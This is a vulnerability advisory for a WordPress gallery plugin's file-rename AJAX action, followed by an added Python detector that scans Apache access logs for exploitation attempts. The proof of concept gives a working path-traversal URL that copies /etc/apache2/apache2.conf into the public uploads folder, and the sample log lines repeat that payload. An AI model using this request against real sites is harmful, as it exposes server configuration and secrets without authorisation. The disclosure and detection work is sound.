The plugin contains a file manager component which allows broad access to the filesystem including deleting files, uploading files, and moving files. In this proof-of-concept we’ll be using path traversal to copy an Apache configuration file into a web-readable directory in order to allow the attacker to read secrets.
Proof of concept
- Visit: http://localhost/wp-admin/admin.php?page=galleries_bwg
- Click “Add New”
- Open the browser’s dev tools
- Click “Add Images”
- Find the request to a URL starting with “/wp-admin/admin-ajax.php?action=addImages&”
- Look for the bwg_nonce parameter in the URL and make a note of the value
- Visit this URL, making sure to replace NONCE_VALUE with the nonce you found: http://localhost/wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE_VALUE&callback=bwg_add_image&task=rename_item&file_names=../../../../../../etc/apache2/apache2.conf&file_new_name=apacheconfigfile
- To access the file, visit: http://localhost/wp-content/uploads/photo-gallery/apacheconfigfile.conf
Note that the number of “../” segments you need to use will vary by server configuration; the file “/etc/apache2/apache2.conf” will not be present in all configurations; and some servers may be configured to block requests for .conf files in wp-content/uploads.
If the www user has write access to /etc, this could break Apache, since the configuration file would be moved rather than copied. In most cases it will not, so PHP’s rename() function will merely copy the file instead of moving it.
Upgrade to version 1.3.34 or later.
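To check whether the request pattern from the proof of concept above has been attempted against a site before it was upgraded, the following added example (not from the advisory or the plugin vendor) scans Apache combined-format access log lines for addImages requests whose file_names or file_new_name parameter contains a path traversal segment, after percent-decoding, and for reads of .conf files under wp-content/uploads. The log lines are constructed for the example and the host and IP addresses are placeholders.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PATH_PARAMS = ("file_names", "file_new_name")

# Constructed sample lines (not from a real server); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges used as placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE&callback=bwg_add_image&task=rename_item&file_names=../../../../../../etc/apache2/apache2.conf&file_new_name=apacheconfigfile HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE&task=rename_item&file_names=..%2F..%2F..%2Fetc%2Fapache2%2Fapache2.conf&file_new_name=apacheconfigfile HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE&task=rename_item&file_names=holiday.jpg&file_new_name=beach HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /wp-content/uploads/photo-gallery/apacheconfigfile.conf HTTP/1.1" 200 4096
"""


def has_traversal(value: str) -> bool:
    """True if any path segment is '..' after repeated percent-decoding
    (catches %2e%2e%2f and double-encoded %252F forms)."""
    decoded = value
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return ".." in decoded.split("/")


def classify(line: str):
    """Return (rule, client_ip, field, value) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.endswith("/wp-admin/admin-ajax.php"):
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("action", [""])[0] == "addImages":
            for param in PATH_PARAMS:
                for value in qs.get(param, []):
                    if has_traversal(value):
                        return ("traversal", m.group("ip"), param, value)
    # A .conf file served from the uploads tree is the second half of the PoC.
    if "/wp-content/uploads/" in parts.path and parts.path.lower().endswith(".conf"):
        return ("conf_read", m.group("ip"), "path", parts.path)
    return None


def scan(log_text: str):
    """Run classify() over every line and collect the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Run scan() over a real access log; a non-empty result is a reason to review the uploads directory for copied files as well as to upgrade.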